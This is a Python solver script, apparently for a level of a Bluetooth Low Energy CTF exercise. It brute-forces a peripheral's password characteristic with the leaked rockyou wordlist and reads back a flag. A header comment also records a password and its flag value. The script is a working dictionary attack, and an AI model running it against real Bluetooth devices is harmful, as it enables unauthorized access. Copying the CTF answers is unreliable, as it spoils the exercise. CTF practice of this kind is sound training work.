#! /usr/bin/python
import binascii
import struct
import sys, os, time
import bluepy.btle as btle
'''
42 0x2A READ WRITE Enter password here. Use rockyou.
44 0x2C READ
46 0x2E READ WRITE write here to goto to scoreboard
password1234 - eca7d1f3cf60a8b5344a
'''
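# Solver for one level of a BLE CTF exercise: select level 02, then feed
# wordlist entries to the password characteristic until the flag
# characteristic returns a non-empty value.
#
# The syntax below parses on both Python 2 and Python 3; the original script
# targeted Python 2 (`<>` comparison and print statements).
rockyou = "/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt"

# Read the target address with a context manager so the handle is closed, and
# strip the trailing newline that a text editor or `echo` leaves in the file;
# an address with a stray "\n" is not a valid peripheral address.
with open('ctf_mac.txt') as mac_file:
    deviceMAC = mac_file.read().strip()
if not deviceMAC:
    sys.exit("ctf_mac.txt is empty; expected the peripheral's MAC address")

p = btle.Peripheral(deviceMAC)
try:
    # svc is not used afterwards; the lookup is kept from the original.
    # NOTE(review): presumably this fails early when service 0x00FF is
    # missing - confirm against the bluepy version in use.
    svc = p.getServiceByUUID(0x00FF)
    print("Attached to peripheral")
    print("Loading level 02")

    # '%0*x' % (4, 2) renders "0002", so the value written is b"\x00\x02".
    hex1 = binascii.unhexlify(str('%0*x' % (4, 2)))
    p.writeCharacteristic(0x30, hex1, withResponse=False)

    # Binary mode: candidates go to the device as raw bytes, and a leaked
    # password list is not guaranteed to decode cleanly in any one encoding.
    with open(rockyou, "rb") as f:
        for password in f:
            candidate = password.rstrip()
            sys.stdout.write("\rTrying: %s " % candidate)
            # Handle 0x2A is the password characteristic (see the notes at the
            # top of the file). As far as this script shows, the peripheral
            # accepts an unbounded number of unauthenticated writes; a
            # production device would require pairing and throttle or lock
            # out repeated failures.
            p.writeCharacteristic(0x2A, candidate, withResponse=True)
            # Handle 0x2C stays empty until the right password was written.
            # The original round-tripped the value through b2a_hex/unhexlify,
            # which yields the same bytes, so test the raw value directly.
            flag = p.readCharacteristic(0x2C)
            if flag:
                print("\rPassword Found: %s" % candidate)
                print("Flag: %s" % flag)
                break
finally:
    # Always release the connection, including when a GATT operation raises
    # or the run is interrupted from the keyboard.
    p.disconnect()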